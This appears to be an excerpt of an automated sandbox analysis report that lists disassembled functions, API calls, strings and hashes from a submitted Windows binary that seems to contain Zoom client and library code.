                • Instruction ID: fc5aa434395b7fdcad479c1f518fa0b9f0fcd83841bea0426d50c3953ad46182
                • Opcode Fuzzy Hash: 00df2742f411a0acb2c15eb83d928e521fab0188c7a6b618214e41f7c60a9452
                • Instruction Fuzzy Hash: F151CD719007098FCB25DFA5C480AEDF7F9FF58314F20861AE496B7251EB70A986CB51
                Function 00CE8AA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE8AC7
                • CatchIt.LIBVCRUNTIME ref: 00CE8BAD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CatchEncodePointer
                • String ID: MOC$RCC
                • API String ID: 1435073870-2084237596
                • Opcode ID: eee011d916d20a006869cb5c3b19554b929041aedf4f46e41d7f49e9c5e3a8a7
                • Instruction ID: a9ca777cebd6676ae3c4381180a3aa6d451392a233d86fc78073602d98e78eb8
                • Opcode Fuzzy Hash: eee011d916d20a006869cb5c3b19554b929041aedf4f46e41d7f49e9c5e3a8a7
                • Instruction Fuzzy Hash: B84167B1900249EFCF16DF99CC81EAEBBB5BF08300F188099F918B7221D7359A55DB50
                Function 00CBE4CA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101synchronizationCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE4D1
                • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,Global\,?,?,?,00000050,00CADE1F,00000004), ref: 00CBE5C1
                • InitializeCriticalSection.KERNEL32(00000000,00000050,00CADE1F,00000004), ref: 00CBE5FF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CreateCriticalH_prolog3_InitializeMutexSection
                • String ID: Global\
                • API String ID: 2906485231-188423391
                • Opcode ID: 4ccfab07915b648ba0b1f5edb7ea4dc21089115da572150fd0ca415de2e0f732
                • Instruction ID: 06910fca4757968ad17248d5aadc2294c2158dc55d323f2ce67a84ba47eaa5dd
                • Opcode Fuzzy Hash: 4ccfab07915b648ba0b1f5edb7ea4dc21089115da572150fd0ca415de2e0f732
                • Instruction Fuzzy Hash: 6E418970D04309DECF14DFE9D895AEDBBB4AF18704F54502EE401B2251EB705A89DF62
                Function 00CE014E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE0155
                  • Part of subcall function 00CE2016: __EH_prolog3.LIBCMT ref: 00CE201D
                  • Part of subcall function 00CE2016: CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                  • Part of subcall function 00CE2016: UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CE2016: RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                • CloseHandle.KERNEL32(?,00000014,00CDE536,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00CE0183
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3String$CloseCreateFreeGuidHandleUuid
                • String ID: %s\%s_%s\%s$Local\CrashRptEvent_%s
                • API String ID: 2012482178-786833359
                • Opcode ID: c6d4515c270509fdff6ccb18481723cdedd60f5a44620b1b5b04ff43666fb333
                • Instruction ID: 5505db4f8ac0b6d60e335f2a9d05d1bc27f88442884944bf8b7fc95aba76548f
                • Opcode Fuzzy Hash: c6d4515c270509fdff6ccb18481723cdedd60f5a44620b1b5b04ff43666fb333
                • Instruction Fuzzy Hash: A93123B1910646ABCB15EFB1CD96AFEF368BF10300F40051AF61663291DF746A18EBA1
                Function 00CBA56E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA575
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,00000014,00CB619C,?,?,?,?,?,?,00000048,00000000,?), ref: 00CBA5D6
                • ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,00000014,00CB619C,?,?,?,?,?,?,00000048,00000000), ref: 00CBA5E8
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBA67A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$E@$$H_prolog3std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 3020564804-306623848
                • Opcode ID: 3d2bb529fd3caa0b49b2d90963224a811da339b0692a18d69837082891a32622
                • Instruction ID: f47d17901064d433c277c3ba11401c8914492621d8be93f007cd37e6e473e119
                • Opcode Fuzzy Hash: 3d2bb529fd3caa0b49b2d90963224a811da339b0692a18d69837082891a32622
                • Instruction Fuzzy Hash: 3631E4719007489FCB15DFB4C845EEEB7B8EF18305F108609F486B7292EB34AA84DB61
                Function 00CBA0AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA0B5
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000007,?,00000000,?,00000014,00000018,00CB6872,?,00000007,?,?,?,?,?), ref: 00CBA122
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(000000C8,?,00000007,?,00000000,?,00000014,00000018,00CB6872,?,00000007,?,?,?,?,?), ref: 00CBA131
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBA1D2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 2161975730-306623848
                • Opcode ID: 76c52f7653d5380b995bc04751924df04130dbfb23469ef9cf80075a9d0c94cc
                • Instruction ID: 54d0108af7759f470d84ff73f057fdc15817d3856ce5d804860dd1833c7e4051
                • Opcode Fuzzy Hash: 76c52f7653d5380b995bc04751924df04130dbfb23469ef9cf80075a9d0c94cc
                • Instruction Fuzzy Hash: 0331AE319006489FDB15EFA4C805BEDB7B5EF04314F008219F54ABB392EB709A85EB61
                Function 00CB28E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                Download Yara Rule
                APIs
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                • ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                Strings
                • Error=%s ErrorID=%d (0x%x) Line number=%d, xrefs: 00CB291E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Pair@tinyxml2@@$Reset@Str@
                • String ID: Error=%s ErrorID=%d (0x%x) Line number=%d
                • API String ID: 3686475888-3947640579
                • Opcode ID: 3ed2d361bddaef4c32a09cef152d339dde3f41c1709e6850c66734bb278424b5
                • Instruction ID: 1642e9986af66bc985f909758a4a1b0be666a70515f496f6e167fe4ef0a56623
                • Opcode Fuzzy Hash: 3ed2d361bddaef4c32a09cef152d339dde3f41c1709e6850c66734bb278424b5
                • Instruction Fuzzy Hash: 5C113672A002416FCB15DF69DC86EEF3B6DDF82314F04012DF84697242EA71AE06D7A0
                Function 00CAC2FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAC308
                  • Part of subcall function 00CAD3AC: __EH_prolog3.LIBCMT ref: 00CAD3B3
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000BC), ref: 00CAC349
                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CAC3AA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AssignCmm@@D@2@@std@@@D@std@@H_prolog3H_prolog3_Ios_base_dtorOther@?$StringU?$char_traits@V12@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID: \\.\pipe\Zoom.
                • API String ID: 3156310435-2585970374
                • Opcode ID: 513a28b77ae1a5eb8f2b49a46f7c6065fe4fd25df038a081936cf6a7ec88293b
                • Instruction ID: 8d9298688d624ba276d0ed5bb4316d4fa5a3fda5e6e0d69f969d011b48d861bb
                • Opcode Fuzzy Hash: 513a28b77ae1a5eb8f2b49a46f7c6065fe4fd25df038a081936cf6a7ec88293b
                • Instruction Fuzzy Hash: FE114675D01208DADB14EFA8D881ADDBBB1BF49318F50805DE806B7351CB706B89DFA5
                Function 00CAE380 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAE387
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                • GetLastError.KERNEL32(?,00000004), ref: 00CAE3BA
                • ?Init@LogMessage@logging@@AAEXPBDH@Z.RWSNDPQSKZ(?,?,?,00000004), ref: 00CAE3CF
                  • Part of subcall function 00CAE4C0: __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                  • Part of subcall function 00CAE4C0: ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00CAE4C0: GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00CAE4C0: GetCurrentThreadId.KERNEL32 ref: 00CAE538
                  • Part of subcall function 00CAE4C0: ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@CurrentH_prolog3$ErrorExplode@Exploded@12@@H_prolog3_H_prolog3_catchInit@LastLocalMessage@logging@@Piece@ProcessStringThreadTime@
                • String ID: Check failed:
                • API String ID: 716325226-2134869012
                • Opcode ID: d8f47e199032eb4a0cba0f5389955a8fa1d201f79427b5c9f077f4df4102939a
                • Instruction ID: b8524441a61f618c2f3afcf2bcaf5be220d9fb6059aec8b5f738815784c9b805
                • Opcode Fuzzy Hash: d8f47e199032eb4a0cba0f5389955a8fa1d201f79427b5c9f077f4df4102939a
                • Instruction Fuzzy Hash: 67014BB5A0021A9FCB00DF64C444A9EB7F1BF89314F148869F8599B351CBB09D01DBA0
                Function 00CAE300 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAE307
                  • Part of subcall function 00CAEA80: __EH_prolog3.LIBCMT ref: 00CAEA87
                • GetLastError.KERNEL32(?,00000008), ref: 00CAE33B
                • ?Init@LogMessage@logging@@AAEXPBDH@Z.RWSNDPQSKZ(?,?,?,00000008), ref: 00CAE350
                  • Part of subcall function 00CAE4C0: __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                  • Part of subcall function 00CAE4C0: ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00CAE4C0: GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00CAE4C0: GetCurrentThreadId.KERNEL32 ref: 00CAE538
                  • Part of subcall function 00CAE4C0: ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@CurrentH_prolog3$ErrorExplode@Exploded@12@@H_prolog3_H_prolog3_catchInit@LastLocalMessage@logging@@Piece@ProcessStringThreadTime@
                • String ID: Check failed:
                • API String ID: 716325226-2134869012
                • Opcode ID: f9f859fdeb41715e429768bf5607ebfe76197e1d13eba6c83ab7c0cf6f7aec12
                • Instruction ID: 6f319c4a3f0f86427519341ca70e7893248773110d12294c92445e12bac3ea0c
                • Opcode Fuzzy Hash: f9f859fdeb41715e429768bf5607ebfe76197e1d13eba6c83ab7c0cf6f7aec12
                • Instruction Fuzzy Hash: B301FBB5A003159FDB04DF64C844A9EBBB1BF85314F14886DF8596B351CAB099459BA0
                Function 00C64590 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(true), ref: 00C6459B
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(false,true), ref: 00C645B4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Compare@?$String
                • String ID: false$true
                • API String ID: 3476810042-2658103896
                • Opcode ID: 4699fca461721f2a16ff20408194ea9bdaf58e0bae6ce034c60a0c1348802c32
                • Instruction ID: 4dca5d069e2d0adbef2da05da5a220dd98a1a1a7473161332a3222c8e483776d
                • Opcode Fuzzy Hash: 4699fca461721f2a16ff20408194ea9bdaf58e0bae6ce034c60a0c1348802c32
                • Instruction Fuzzy Hash: BFE04F312506085FEB09DFE4E85166933D89B80719F004055F91DCB141FA30F9409754
                Function 00C645D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(true), ref: 00C645DB
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(false,true), ref: 00C645F4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Compare@?$String
                • String ID: false$true
                • API String ID: 3476810042-2658103896
                • Opcode ID: 682fc6b48b8f79c561d58c5221e948300655d2e97a505cc039135e0206cf232c
                • Instruction ID: c7b6fca6e91415c3859360776c95109f24b7123199cc7d5197241198c2779fe3
                • Opcode Fuzzy Hash: 682fc6b48b8f79c561d58c5221e948300655d2e97a505cc039135e0206cf232c
                • Instruction Fuzzy Hash: 55E046362542089FDB19DEE4E982A6937E8AB45B55F008060FD1ECB240EA31EA068B55
                Function 00C6E0C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E0C7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.unload.response,00009CDA,Result,00000004), ref: 00C6E0E2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
